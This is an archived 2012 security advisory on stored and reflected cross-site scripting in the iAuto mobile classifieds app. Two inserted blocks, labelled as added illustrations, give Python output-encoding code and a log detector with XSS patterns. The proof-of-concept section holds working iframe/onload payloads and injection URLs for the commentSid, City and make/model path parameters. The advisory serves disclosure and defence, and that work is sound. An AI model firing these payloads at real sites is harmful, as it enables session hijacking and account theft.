
iAuto Mobile Application 2012 Cross Site Scripting

Posted Aug 7, 2012
Authored by Benjamin Kunz Mejri | Site vulnerability-lab.com

iAuto Mobile Application 2012 suffers from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
MD5 | aefa8ae5d10f47614153515ed22a7b8d

Title:
======
iAuto Mobile Application 2012 - Multiple Web Vulnerabilities


Date:
=====
2012-07-11


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=658


VL-ID:
======
658


Common Vulnerability Scoring System:
====================================
3.5


Introduction:
=============
With Internet on mobile devices booming, having a desktop-oriented version is just not enough anymore. Empower your
visitors with content designed for mobile Web by offering them a mobile version of your classifieds website.
WorksForWeb is offering custom-made mobile frontend addons for our classified solutions. The mobile version of your
website will present all the data of the regular website in the format optimized for iPhone, Android, iPad, BlackBerry,
Symbian, or other mobile devices. Mobile frontend addon features:

Quick and advanced search,
Browsing,
Tabbed design,
Multi-language interface,
Google Maps,
And much more

Addon is seamlessly integrated with your main website. Your website automatically detects mobile browsers to redirect
mobile visitors to the mobile-optimized content. Why do you need a mobile gateway to your website? Because all the market
leaders have mobile access, and so should you. The mobile technology is redefining our future, and you should be one step
ahead of your smaller competitors. Mobile users now make up a large percentage of your target audience, and their needs
to access information easily are important to address. At this moment, the mobile addon is compatible with classified
solutions of v.5.2 and above. The price of the mobile frontend addon is only $175. This price includes a free expert
installation on your server.

(Copy of the Vendor Homepage: http://www.worksforweb.com/classifieds-software/addons/mobile-addon/ )


Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple cross site scripting vulnerabilities in the iAuto Mobile APP for Android, iOS & Blackberry.


Report-Timeline:
================
2012-07-10: Public or Non-Public Disclosure


Status:
=======
Published


Exploitation-Technique:
=======================
Remote


Severity:
=========
Medium


Details:
========
1.1
A persistent input validation vulnerability has been detected in the iAuto Mobile APP for Android, iOS (iPhone), Ericsson & Blackberry.
The bug allows remote attackers to inject malicious script code on the application side (persistent). The persistent vulnerability
is located in the comments module and is bound to the vulnerable commentSid parameter. Successful exploitation of the vulnerability can lead to session
hijacking (manager/admin) or stable (persistent) context manipulation. Exploitation requires low user interaction & a privileged user account.

Vulnerable Module(s):
[+] Comments > Reply to The Comment Listing

Vulnerable Parameter(s):
[+] commentSid & commentInfo


1.2
Multiple non-persistent cross site scripting vulnerabilities have been detected in the iAuto Mobile APP for Android, iOS (iPhone), Ericsson & Blackberry.
The vulnerabilities allow remote attackers to hijack website customer, moderator or admin sessions with medium or high required user interaction or
a local low privileged user account. The bugs are located in Dealer > Search Sellers and in Browse by Make and Model, bound to the vulnerable
parameters city & path/url. Successful exploitation can result in account theft, client side phishing & client-side content request manipulation.
Exploitation requires medium or high user interaction & no privileged web application user account.


Vulnerable Module(s):
[+] Dealer > Search Sellers > City
[+] Browse by Make and Model > /../ >

Vulnerable Parameter(s):
[+] City
[+] Folder Access Listing
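The following hardening example is added to this page for illustration; it is not code from the advisory or from the iAuto / WorksForWeb product. It renders the three echo points the advisory names (the commentSid/commentInfo reply description, the City search value and the make/model path segment) with context-aware output encoding, next to an unsafe concatenation of the kind the advisory describes, and audits each rendered fragment the way a browser would tokenise it. Function names and the HTML fragments are assumptions about the application's templates; the payload string is the one quoted in the advisory's proof of concept, used only as test input.

```python
"""Hardened rendering of the iAuto echo points (added example, not product code).
Template fragments and function names are assumptions."""

import html
import re
from html.parser import HTMLParser

# Payload string quoted in the advisory's proof of concept; used here only to
# confirm that the hardened renderers neutralise it.
POC_STRING = ('"><iframe src=http://vuln-lab.com width=1000 height=900 '
              'onload=alert("VulnerabilityLab") <')


def esc(value: str) -> str:
    """Escape & < > " and ' so a value can neither close a quoted attribute
    nor open a tag. This is correct for text nodes and quoted attributes;
    JavaScript, CSS and URL contexts need their own encoders."""
    return html.escape(str(value), quote=True)


def render_reply_description(comment_sid: str, comment_info: str) -> str:
    """'You are replying to the comment #...' fragment (assumed markup).
    The identifier is allow-listed (digits only) before use and the free text
    is escaped, so a stored value never reaches the page as markup."""
    if not re.fullmatch(r"[0-9]{1,12}", comment_sid):
        raise ValueError("commentSid must be a numeric identifier")
    return ('<div class="commentInfo">You are replying to the comment '
            f'#{esc(comment_sid)}: {esc(comment_info)}</div>')


def render_city_search_form(city: str) -> str:
    """Reflects the submitted City[equal] value into a quoted value attribute."""
    return f'<input type="text" name="City[equal]" value="{esc(city)}">'


def render_city_search_form_unsafe(city: str) -> str:
    """Raw concatenation, the shape of the defect the advisory reports.
    Kept only for the contrast in audit(); never use in real templates."""
    return f'<input type="text" name="City[equal]" value="{city}">'


def render_make_model_heading(path_segment: str) -> str:
    """Echoes the browse-by-make-model path segment into a text node."""
    return f"<h1>{esc(path_segment)}</h1>"


class _TagAudit(HTMLParser):
    """Collects the start tags and inline event-handler attributes a browser
    would see in a fragment."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers += [name for name, _ in attrs if name.startswith("on")]


def audit(fragment: str):
    """Returns (tags seen, inline event handlers seen) for a rendered fragment.
    A hardened fragment must show only its own template tag and no handlers."""
    parser = _TagAudit()
    parser.feed(fragment)
    parser.close()
    return parser.tags, parser.handlers


if __name__ == "__main__":
    for name, fragment in [
        ("city (hardened)", render_city_search_form(POC_STRING)),
        ("city (unsafe)", render_city_search_form_unsafe(POC_STRING)),
        ("make/model", render_make_model_heading(POC_STRING)),
        ("reply", render_reply_description("448", POC_STRING)),
    ]:
        print(name, audit(fragment))
```

The audit step is the check worth keeping in a regression suite: after every template change, feed the known payload through each renderer and assert that the parser reports only the template's own tag and no `on*` attribute.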


Proof of Concept:
=================
1.1
The persistent vulnerabilities can be exploited by remote attackers with a low privileged user account and with low required user interaction.
For demonstration or reproduce ...


Review: Add Comments - Listing

<div class="addComment">
<h1>Reply to The Comment</h1>
<div class="pageDescription">
<div class="commentInfo">You are replying to the comment
#"><iframe src="iAuto%20%20%20Listing%20Comments%20Reply%20to%20The%20Comment-Dateien/[PERSISTENT INJECTED CODE!])' <="" to=""
listing="" #448="" "<span="" class="fieldValue fieldValueYear" height="900" width="1000">2007</span>
<span class="fieldValue fieldValueMake">Acura</span>



1.2
The client side cross site scripting vulnerabilities can be exploited by remote attackers with medium or high required user interaction.
For demonstration or reproduce ...

String: "><iframe src=http://vuln-lab.com width=1000 height=900 onload=alert("VulnerabilityLab") <

Dealer > Search Sellers > City

PoC:
http://iauto.xxx.com/iAuto/m/users/search/?DealershipName[equal]=jamaikan-hope23&City[equal]=%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com+
width%3D1000+height%3D900+onload%3Dalert%28%22VulnerabilityLab%22%29+%3C&State[equal]=11&action=search


Browse by Make and Model / AC Cobra / >

PoC:
http://iauto.xxx.com/iAuto/m/browse-by-make-model/AC+Cobra/%22%3E%3Ciframe%20src=http://vuln-lab.com%20
width=1000%20height=900%20onload=alert%28%22VulnerabilityLab%22%29%20%3C/


Comments > Reply to The Comment > Topic & Text (commentSid)

PoC:
http://iauto.xxx.com/iAuto/m/comment/add/?listingSid=448&commentSid=%22%3E%3Ciframe%20src=http://vuln-lab.com%20width=1000
%20height=900%20onload=alert%28%22VulnerabilityLab%22%29%20%3C&returnBackUri=%2Flisting%2Fcomments%2F448%2F%3F
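A request-log detector for the pattern these PoC URLs share, added here as an illustration and not part of the advisory. It URL-decodes each request target (repeatedly, so double encoding does not hide a payload) and flags targets whose decoded path or query contains a tag opener or an inline event-handler attribute. The access-log lines are constructed for this example in Apache combined format; the request paths are the advisory's PoC paths plus two benign requests, and the client addresses and timestamps are made up.

```python
"""Detection of reflected/stored-XSS probes in web server logs (added example)."""

import re
from urllib.parse import unquote_plus

# Constructed combined-format log lines. Targets are the advisory's PoC paths
# (lines 1, 2 and 4) and two benign requests; addresses/timestamps are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Jul/2012:10:01:02 +0000] "GET /iAuto/m/users/search/?DealershipName[equal]=jamaikan-hope23&City[equal]=%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com+width%3D1000+height%3D900+onload%3Dalert%28%22VulnerabilityLab%22%29+%3C&State[equal]=11&action=search HTTP/1.1" 200 5120
10.0.0.6 - - [11/Jul/2012:10:01:09 +0000] "GET /iAuto/m/browse-by-make-model/AC+Cobra/%22%3E%3Ciframe%20src=http://vuln-lab.com%20width=1000%20height=900%20onload=alert%28%22VulnerabilityLab%22%29%20%3C/ HTTP/1.1" 200 4096
10.0.0.7 - - [11/Jul/2012:10:02:15 +0000] "GET /iAuto/m/users/search/?City[equal]=Berlin&State[equal]=11&action=search HTTP/1.1" 200 5000
10.0.0.8 - - [11/Jul/2012:10:03:00 +0000] "GET /iAuto/m/comment/add/?listingSid=448&commentSid=%22%3E%3Ciframe%20src=http://vuln-lab.com%20width=1000%20height=900%20onload=alert%28%22VulnerabilityLab%22%29%20%3C&returnBackUri=%2Flisting%2Fcomments%2F448%2F%3F HTTP/1.1" 302 0
10.0.0.9 - - [11/Jul/2012:10:04:00 +0000] "GET /iAuto/m/browse-by-make-model/AC+Cobra/ HTTP/1.1" 200 4000
"""

# Combined log format: client, identd, user, [timestamp], "METHOD target PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# A '<' followed by a tag, comment or end-tag start; matching the decoded
# request, not the raw one, defeats percent-encoding of the bracket.
TAG_RE = re.compile(r'<\s*/?\s*[a-z!?]', re.I)
# Inline event handler such as onload= or onerror=. Word boundary keeps
# ordinary parameter names like action= from matching.
HANDLER_RE = re.compile(r'\bon[a-z]+\s*=', re.I)


def deep_decode(value: str, rounds: int = 3) -> str:
    """URL-decode until the string stops changing (bounded), so that %2522
    and other double-encoded forms are seen as the characters they become."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_log(log_text: str) -> list:
    """Returns one record per request whose decoded target carries markup.
    Both the path (browse-by-make-model case) and the query string
    (City[equal], commentSid) are covered because the whole target is checked."""
    hits = []
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # not a combined-format line; skip rather than crash
        decoded = deep_decode(match["target"])
        reasons = []
        if TAG_RE.search(decoded):
            reasons.append("tag opener")
        if HANDLER_RE.search(decoded):
            reasons.append("event handler")
        if reasons:
            hits.append({
                "ip": match["ip"],
                "time": match["ts"],
                "status": match["status"],
                "reasons": reasons,
                "target": match["target"],
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["status"], ", ".join(hit["reasons"]), hit["target"][:60])
```

A 200 response on a flagged search or browse request is only evidence that the probe was served, not that it executed; for the comment/add case the 302 plus a later view of the comment listing is the sequence to correlate, since the injected value is stored and shown to every subsequent reader.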



Risk:
=====
1.1
The security risk of the persistent input validation vulnerability is estimated as medium(+).

1.2
The security risk of the non-persistent cross site scripting vulnerabilities is estimated as low(+)|(-)medium.


Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability Laboratory



--
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: research@vulnerability-lab.com
